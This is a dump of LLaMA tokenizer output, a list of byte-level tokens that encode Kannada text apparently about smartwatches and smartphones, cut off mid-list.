"Tokenized by LLaMA tokenizer:['▁', '<0x0A>', 'ರ', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB3>', '<0x8B>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA7>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x95>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xAD>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', 
'<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x87>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '<0xE0>', '<0xB2>', '<0xA3>', '<0xE0>', '<0xB2>', '<0x95>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xB9>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA7>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAA>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9A>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', 'ರ', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '<0xE0>', '<0xB2>', '<0x9A>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x8E>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xA6>', '್', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', 
'\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAD>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA6>', '▁', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x81>', 'ರ', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0x97>', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAD>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9C>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '<0x0A>', '<0xE0>', '<0xB2>', '<0xB9>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x81>', ',', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', 
'\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x81>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x96>', 'ರ', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x87>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x89>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xAE>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA6>', 'ರ', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x82>', '▁', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xAA>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', 
'್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA6>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '▁', '<0xE0>', '<0xB2>', '<0x9C>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x8E>', '<0xE0>', '<0xB2>', '<0xB8>', '್', '▁', '2', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xBF>', ',', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAA>', '್', 'ರ', '<0xE0>', '<0xB3>', '<0x8A>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAC>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAA>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x98>', '<0xE0>', '<0xB3>', '<0x8B>', '<0xE0>', '<0xB2>', '<0xB7>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x86>', '.', '▁', '<0xE0>', '<0xB2>', '<0xB9>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA6>', '್', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9C>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBE>', '▁', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB3>', '<0x8A>', 'ರ', '<0xE0>', '<0xB3>', '<0x86>', '<0xE0>', '<0xB2>', '<0xAF>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', 
'<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0x85>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '<0xE0>', '<0xB2>', '<0xA8>', '▁', '<0xE0>', '<0xB2>', '<0x88>', '▁', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x87>', '<0xE0>', '<0xB2>', '<0x96>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x8A>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB3>', '<0x80>', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0x93>', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBF>', 'ರ', '<0xE0>', '<0xB2>', '<0xBF>', '.', '<0x0A>', '<0xE0>', '<0xB2>', '<0x86>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB3>', '<0x88>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xB6>', '<0xE0>', '<0xB2>', 